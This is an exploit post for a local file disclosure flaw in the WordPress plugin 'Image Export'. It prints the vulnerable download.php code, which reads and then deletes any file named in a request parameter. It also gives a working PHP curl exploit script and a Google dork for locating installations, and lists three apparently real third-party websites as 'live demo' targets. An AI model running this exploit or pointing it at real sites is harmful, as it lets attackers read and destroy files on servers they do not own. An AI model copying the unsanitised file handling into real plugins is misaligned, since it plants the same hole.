" Image Export WordPress Plugin - Local File Disclosure " in this bug , Attcker is able to download the files on the server and just after the download process file are deleted from the server. Source : https://github.com/wp-plugins/image-export =========== Vulnerable page : =========== image-export/download.php ========== Vulnerable Code : ========== <?php if ( isset( $_REQUEST['file'] ) && !empty( $_REQUEST['file'] ) ) { $file = $_GET['file']; header( 'Content-Type: application/zip' ); header( 'Content-Disposition: attachment; filename="' . $file . '"' ); readfile( $file ); unlink( $file ); exit; } ?> ========= Exploit : ========= <?php # Author : Shahab Shamsi # Title : Image Explort WordPress Plugin - Local File Disclosure # Version : All Version # Google Dork : inurl:/wp-content/plugins/image-export/ # Date : 09.September.2016 # Email : info@securityman.org # Vendor : https://github.com/wp-plugins/image-export # Category : Webapps $target = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://localhost/wp-content/plugins/image-export/download.php?file=image-export.php"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; /* Contact Me : Telegram : @R4DIK4L Email : info@securityman.org WebSilte : WwW.MohitAmn.Org Tnx : AmirHossein Farjad Tnx : Sadegh Safaeian Curl By : R@DIK@L */ ?> ============ Live Demo : ============ http://www.c3inmobiliaria.es/wp-content/plugins/image-export/download.php https://www.123ehost.com/wp-content/plugins/image-export/download.php http://www.barankhabar.ir/wp-content/plugins/image-export-master/download.php